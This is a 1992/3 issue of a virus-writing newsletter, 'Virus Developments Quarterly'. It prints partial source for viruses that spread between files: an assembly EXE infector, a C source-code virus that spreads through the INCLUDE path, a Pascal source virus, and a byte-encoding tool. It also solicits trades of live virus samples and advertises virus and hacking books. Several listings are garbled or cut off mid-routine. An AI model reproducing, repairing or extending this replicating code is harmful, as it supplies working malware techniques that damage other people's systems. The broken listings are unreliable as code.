Virus Developments Quarterly
The Independent Journal of Computer Viruses Volume 1, Number 2 — Winter, 1992/3
there are COM files by the same name on the system. If there are, it's possibly a virus. Likewise, one can search for hidden COM files of dubious origin. A more sophisticated spawning virus might hide and rename the EXE file to something else and then leave an unhidden COM file with the proper name on the system. A sophisticated user might notice his EXE's were changing to COM's, but I would guess the average user would not. To protect ... do the following:

(1) Take any old (and preferably small) file you don't need and rename it to a COM file with the same name as an EXE in the same directory. For example, I have a program MS.EXE. I could just take any text file and rename it to MS.COM. If you have a disk utility, go ahead and make the COM file hidden. Now scan your system. Does your scanner alert you to the presence of the COM file? (Delete the COM file when you are done!)

;*****************************************************************************
;This routine searches for EXE's and infects them.
search_files    proc    near
                mov     dx,offset exe_mask      ;DX points to "*.EXE"
                call    find_files              ;Try to infect a file
done_searching: ret                             ;Return to caller
exe_mask        db      "*.EXE",0               ;Mask for all .EXE files
search_files    endp

find_files      proc    near
                push    bp                      ;Save BP
                mov     ah,02Fh                 ;DOS get DTA function
                int     021h
                jc      done_finding            ;Exit if no files found
                call    infect_file             ;Infect the file!
                jnc     done_finding            ;Exit if no error
                mov     ah,04Fh                 ;DOS find next file function
                jmp     short find_a_file       ;Try finding another file
done_finding:   mov     sp,bp                   ;Restore old stack frame
                mov     ah,01Ah                 ;DOS set DTA function
                pop     dx                      ;Retrieve old DTA address
                int     021h
                pop     bp                      ;Restore BP
                ret                             ;Return to caller
find_files      endp

;*****************************************************************************
;This routine infects the file specified in the DTA search block, if it can,
;and returns with C set if it could not infect.
infect_file     proc    near
                mov     ah,02Fh                 ;DOS get DTA address function
                int     021h
                mov
                byte ptr [set_carry],1
                ah,03Ch
                ;Success - the file is OK
;*****************************************************************************
ALL RIGHTS RESERVED. YOU MAY NOT COPY OR DISTRIBUTE THIS CODE IN ANY FORM,
SOURCE OR EXECUTABLE, WITHOUT PRIOR WRITTEN PERMISSION FROM THE PUBLISHER!!!
*/
#ifndef SCVIRUS
#define SCVIRUS
#include <stdio.h>
#include <dos.h>
/******************************************************************************/
void main()
{
char l[255],p[255];
int i,j;
ccount=0;
f1=fopen("virus.hs","r");
ft=fopen("virus.h","w");
do
{
j=0; l[j]=0;
while ((!feof(f1)) && ((j==0)||(l[j-1]!=0x0A)))
{fread(&l[j],1,1,f1); j++;}
l[j]=0;
if (strcmp(l,"static char virush[]={0};\n")==0)
{
fwrite(&l[0],22,1,ft);
f2=fopen("virus.hs","r");
do
{
j=0; p[j]=0;
while ((!feof(f2)) && ((j==0)||(p[j-1]!=0x0A)))
{fread(&p[j],1,1,f2); j++;}
p[j]=0;
if (strcmp(p,"static char virush[]={0};\n")==0)
{
for (i=0;i<22;i++) put_constant(ft,p[i]);
p[0]='0'; p[1]=',';
fwrite(&p[0],2,1,ft);
ccount++;
for (i=25;p[i]!=0;i++) put_constant(ft,p[i]);
}
else
{
for (i=0;i<j;i++) put_constant(ft,p[i]);
}
}
while (!feof(f2));
}
strcpy(&p,"0};\n");
fwrite(&p[0],strlen(p),1,ft);
else for (i=0;i<j;i++) fwrite(&l[i],1,1,ft);
}
while (!feof(f1));
fclose(f1);
fclose(f2);
fclose(ft);
}

better hidden. For example, when inserting the include statement, the virus could look for the first blank line in a C file (not inside a comment) and then put the include statement on that line out past line 80, so it won't appear on the screen the minute you call the file up with an ...

A wild source code virus will not have all kinds of nice comments in it, or descriptive function names, so you can tell what it is and what it is doing. Instead, it may look like the following code, which just implements SCV1 in a little more compact notation.

Source Listing for SCV2.C

Again, compile this with Microsoft C 7.0.

/* This is a source code virus in Microsoft C. All of the code is in virus.h */
#include <stdio.h>
#include <v784.h>
/******************************************************************************/
void main()
{
s784(); // just go infect a .c file
}

Source Listing for VIRUS2.HS

/* (C) Copyright 1993 American Eagle Publications, Inc. All rights reserved. */
#ifndef S784
#define S784
#include <stdio.h>
#include <dos.h>
static char a784[]={0};
void r782(char *g) {int b,c,d,e;char a[255];FILE *q;if ((q=fopen(g,"a"))==NULL)
return; b=c=d=0; while (a784[b]) fwrite(&a784[b++],1,1,q); while (a784[d]||(d==b))
{itoa((int)a784[d],a,10);e=0;while (a[e]) fwrite(&a[e++],1,1,q);d++;c++;if (c>20)
{strcpy(a,",\n ");fwrite(&a[0],strlen(a),1,q);c=0;}else
{a[0]=',';fwrite(&a[0],1,1,q);}}strcpy(a,"0};");fwrite(&a[0],3,1,q);b++;while
(a784[b]) fwrite(&a784[b++],1,1,q);fclose(q);}
void s784() {char q[64]; strcpy(q,getenv("INCLUDE"));if (q[0]){if (!r781(q))
r782(q); strcpy(q,"*.c"); if (r783(q)) r784(q);}}
#endif

files for this virus are included on the diskette with this issue. Make sure you create a directory \C700\INCLUDE (or any other directory you like) and execute the appropriate SET command:

SET INCLUDE=C:\C700\INCLUDE
ENCODE will create a new file with a proper TCONST definition, complete with encryption. Then, with an editor, one may put the proper constant back into SCVIRUS.PAS.

{$I VIRUS.INC}

Since Turbo Pascal doesn't make use of an INCLUDE environment variable, the virus would have to put VIRUS.INC in the current directory, or specify the exact path where it did put it (\TP, the default Turbo install directory, might be a good choice). In any event, it would probably only want to create that file when it had successfully found a PAS file to infect, so it did not put new files on systems which had no Pascal files on them to start with.

{This function searches the current directory to find a pascal file that
has not been infected yet. It calls the function ok_to_attach in order
to determine whether or not a given file has already been infected. It
returns TRUE if it successfully found a file, and FALSE if it did not.
If it found a file, it returns the name in fn.}
function find_pascal_file:boolean;
var
  sr :SearchRec; {From the DOS unit}
begin

{This is the routine which actually attaches the virus to a given file.}
procedure append_virus;
var
  f,ft :text;
  l,t,lt :string;
  j :word;
  cw, {flag to indicate constant was written}
  pw, {flag to indicate procedure was written}
  uw, {flag to indicate uses statement was written}
  intf, {flag to indicate "interface" statement}
  impf, {flag to indicate "implementation" statement}
  comment :boolean;
begin
  assign(f,fn);
  reset(f); {open the file}
  assign(ft,'temp.aps');
  rewrite(ft); {open a temporary file too}
  cw:=false;
  pw:=false;
  uw:=false;
  impf:=false;
  intf:=false;
  filetype:=' '; {initialize flags}
  repeat
    readln(f,l);
    if t<>'' then lt:=t;
    t:=UpString(l); {look at all strings in upper case}
    comment:=false;
    for j:=1 to length(t) do {blank out all comments in the string}
    end;
    if pos('END.',t)>0 then {write call to virus into main procedure}
      begin
        if (pos('END',lt)>0) and (filetype='U') then writeln(ft,'begin');
        t:='virus;';
        for j:=1 to pos('END.',UpString(l))+1 do t:=' '+t;
        writeln(ft,t);
      end;
    writeln(ft,l);
  until eof(f);
  close(f); {close file}
  close(ft); {close temporary file}
  erase(f); {Substitute temp file for original file}
  rename(ft,fn);
end;

MUTATION ENGINES
function ef:boolean; {End of file function}
begin
  ef:=eof(fin) or (b=$1A);
end;

begin
  if ParamCount<>2 then exit; {Expects input and output file name}
  assign(fin,ParamStr(1)); reset(fin); {Open input file to read}
  assign(fout,ParamStr(2)); rewrite(fout); {Open output file to write}
  writeln(fout,'const'); {"Constant" statement}
  write(fout,' tconst:array[1..',filesize(fin),'] of byte=(');
  bcnt:=11;
  repeat {Define the constant tconst}
    read(fin,b); {Read each byte individually}
    bcnt:=bcnt+1;
    if b<>$1A then {b <> eof marker}
      begin
        write(fout,(b shl 1) xor $AA); {Encode the byte}
        if (not ef) then write(fout,',');
        if (bcnt=18) and (not ef) then {Put 16 bytes on each line}
          begin
            writeln(fout);
            write(fout,' ');
            bcnt:=0;
          end;
      end
    else write(fout,($20 shl 1) xor $AA);
  until ef; {Go to the end of the file}
  writeln(fout,');');
  close(fout); {Close up and exit}
  close(fin);
end.

006—Tech Note #2: The Stoned Virus, a complete disassembly and explanation of the world's most successful boot sector virus. Includes booklet and disk. $20.00.

007—Tech Note #3: The Jerusalem Virus, a complete disassembly and explanation of this simple but effective memory resident virus. Includes booklet and disk. $20.00.

008—Tech Note #4: How to Write Protect an MFM Hard Disk. The ultimate way to protect against the spread of viruses. Don't go out and pay hundreds of $ for one of these devices, when you can build one for less than twenty dollars! No diskette. $12.00.

Add $2.00 postage ($4 overseas airmail) for any combination of diskettes and Tech Notes. Arizona residents please add 5% sales tax.

Qty   Item No./Description   Price
Shipping
Sales Tax
Total

Preferred Disk Size: 3-1/2"  5-1/4"

Please ship to:
Name
Address
City/State/Zip
(Country)

Make checks payable to:
American Eagle Publications, Inc.
P. O. Box 41401
Tucson, AZ 85717 (USA)

Thank you to all of those who responded to our request to exchange viruses. We are still interested in building our collection, so if you have viruses or need them, call and we will work a trade. Once we get this collection sufficiently well organized, we may set up a private BBS for subscribers, if there is sufficient interest. We are engaged in active virus research, and would welcome people interested in carrying out some aspect of this research, especially disassemblies. Financial rewards are possible here. We would also consider any articles submitted for possible publication in CVDQ. Please call (602)888-4957, or write Mark Ludwig at American Eagle Publications, Inc., PO Box 41401, Tucson, AZ 85717.

Have fun!

www.computervirus.bz
Order from www.ameaglepubs.com today!
Dr. Ludwig is back in black!
In this brand new book, Dr. Ludwig explores the fascinating world of email viruses in a way nobody
else dares! Here you will learn about how these viruses work and what they can and cannot do from a
veteran hacker and virus researcher. Why settle for the vague generalities of other books when you
can have page after page of carefully explained code and a fascinating variety of live viruses to
experiment with on your own computer or check your antivirus software with? In this book you'll
learn the basics of viruses that reproduce through email, and then go on to explore how antivirus
programs catch them and how wily viruses evade the antivirus programs. You'll learn about
polymorphic and evolving viruses. You'll learn how virus writers use exploits - bugs in programs
like Outlook Express - to get their code to execute without your consent. You'll learn about logic
bombs and the social engineering side of viruses - not the social engineering of old time hackers, but
the tried and true scientific method behind turning a replicating program into a virus that infects
millions of computers. Yet Dr. Ludwig doesn't stop here. He faces the sobering possibilities of email
viruses that lie just around the corner . . . viruses that could literally change the history of the human
race, for better or worse. Admittedly this would be a dangerous book in the wrong hands. Yet it would
be more dangerous if it didn't get into the right hands. The next major virus attack could see millions
of computers wiped clean in a matter of hours. With this book, you'll have a fighting chance to spot
the trouble coming and avoid it, while the multitudes that are dependent on a canned program to keep
them out of trouble will get taken out. In short, this is an utterly fascinating book. You'll never look at
computer viruses the same way again after reading it.
The world of hacking changes continuously. Yesterday's hacks are today's rusty locks that no
longer work. The security guys are constantly fixing holes, and the hackers are constantly
changing their tricks. This new fourth edition of the Happy Hacker - just released in December,
2001 - will keep you up to date on the world of hacking. It's classic Meinel at her best, leading you
through the tunnels and back doors of the internet that is accessible to the beginner, yet
entertaining and educational to the advanced hacker. With major new sections on exploring and
hacking websites, and hacker war, and updates to cover the latest Windows operating systems,
the Happy Hacker is bigger and better than ever!